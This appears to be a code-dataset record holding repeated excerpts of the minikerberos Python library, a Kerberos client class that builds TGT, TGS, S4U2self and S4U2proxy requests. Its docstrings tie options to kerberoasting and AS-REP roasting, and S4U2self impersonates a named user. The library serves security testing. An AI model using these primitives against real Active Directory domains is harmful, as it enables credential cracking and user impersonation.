ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L287-L348 | [
"def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP\n\t\"\"\"\n\tCreates credential object from the TGS and adds to the ccache file\n\tThe TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT\n\n\... | class KerbrosComm:
def __init__(self,ccred, ksoc, ccache = None):
self.usercreds = ccred
self.ksoc = ksoc
self.user_ccache = ccache
self.ccache = CCACHE()
self.kerberos_session_key = None
self.kerberos_TGT = None
self.kerberos_TGT_encpart = None
self.kerberos_TGS = None
self.kerberos_cipher = None
self.kerberos_cipher_type = None
self.kerberos_key = None
@staticmethod
def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc
def do_preauth(self, rep):
#now getting server's supported encryption methods
supp_enc_methods = collections.OrderedDict()
for enc_method in METHOD_DATA.load(rep['e-data']).native:
data_type = PaDataType(enc_method['padata-type'])
if data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:
if data_type == PaDataType.ETYPE_INFO:
enc_info_list = ETYPE_INFO.load(enc_method['padata-value'])
elif data_type == PaDataType.ETYPE_INFO2:
enc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])
for enc_info in enc_info_list.native:
supp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']
logger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))
logger.debug('Constructing TGT request with auth data')
#now to create an AS_REQ with encrypted timestamp for authentication
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
now = datetime.datetime.utcnow()
#creating timestamp asn1
timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
logger.debug('Selecting common encryption type: %s' % supp_enc.name)
self.kerberos_cipher = _enctype_table[supp_enc.value]
self.kerberos_cipher_type = supp_enc.value
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)
pa_data_2 = {}
pa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))
pa_data_2['padata-value'] = EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
kdc_req_body['etype'] = [supp_enc.value] #selecting according to server's preferences
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_2,pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending TGT request to server')
return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return
def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
now = datetime.datetime.utcnow()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
pa_pac_opts = {}
pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_tgs_req = {}
pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()
krb_tgs_body = {}
#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_body['additional-tickets'] = [s4uself_ticket]
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
def get_something(self, tgs, encTGSRepPart, sessionkey):
now = datetime.datetime.utcnow()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
print(encTGSRepPart['key']['keytype'])
cipher = _enctype_table[encTGSRepPart['key']['keytype']]
authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ticket'] = Ticket(tgs['ticket'])
ap_req['ap-options'] = APOptions(set([]))
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
return AP_REQ(ap_req).dump()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.S4U2self | python | def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | user_to_impersonate : KerberosTarget class | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L351-L453 | [
"def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP\n\t\"\"\"\n\tCreates credential object from the TGS and adds to the ccache file\n\tThe TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT\n\n\... | class KerbrosComm:
def __init__(self,ccred, ksoc, ccache = None):
self.usercreds = ccred
self.ksoc = ksoc
self.user_ccache = ccache
self.ccache = CCACHE()
self.kerberos_session_key = None
self.kerberos_TGT = None
self.kerberos_TGT_encpart = None
self.kerberos_TGS = None
self.kerberos_cipher = None
self.kerberos_cipher_type = None
self.kerberos_key = None
@staticmethod
def from_tgt(ksoc, tgt, key):
"""
Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file.
"""
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc
def do_preauth(self, rep):
#now getting server's supported encryption methods
supp_enc_methods = collections.OrderedDict()
for enc_method in METHOD_DATA.load(rep['e-data']).native:
data_type = PaDataType(enc_method['padata-type'])
if data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:
if data_type == PaDataType.ETYPE_INFO:
enc_info_list = ETYPE_INFO.load(enc_method['padata-value'])
elif data_type == PaDataType.ETYPE_INFO2:
enc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])
for enc_info in enc_info_list.native:
supp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']
logger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))
logger.debug('Constructing TGT request with auth data')
#now to create an AS_REQ with encrypted timestamp for authentication
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
now = datetime.datetime.utcnow()
#creating timestamp asn1
timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
logger.debug('Selecting common encryption type: %s' % supp_enc.name)
self.kerberos_cipher = _enctype_table[supp_enc.value]
self.kerberos_cipher_type = supp_enc.value
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)
pa_data_2 = {}
pa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))
pa_data_2['padata-value'] = EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
kdc_req_body['etype'] = [supp_enc.value] #selecting according to server's preferences
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_2,pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending TGT request to server')
return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
"""
decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT
"""
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
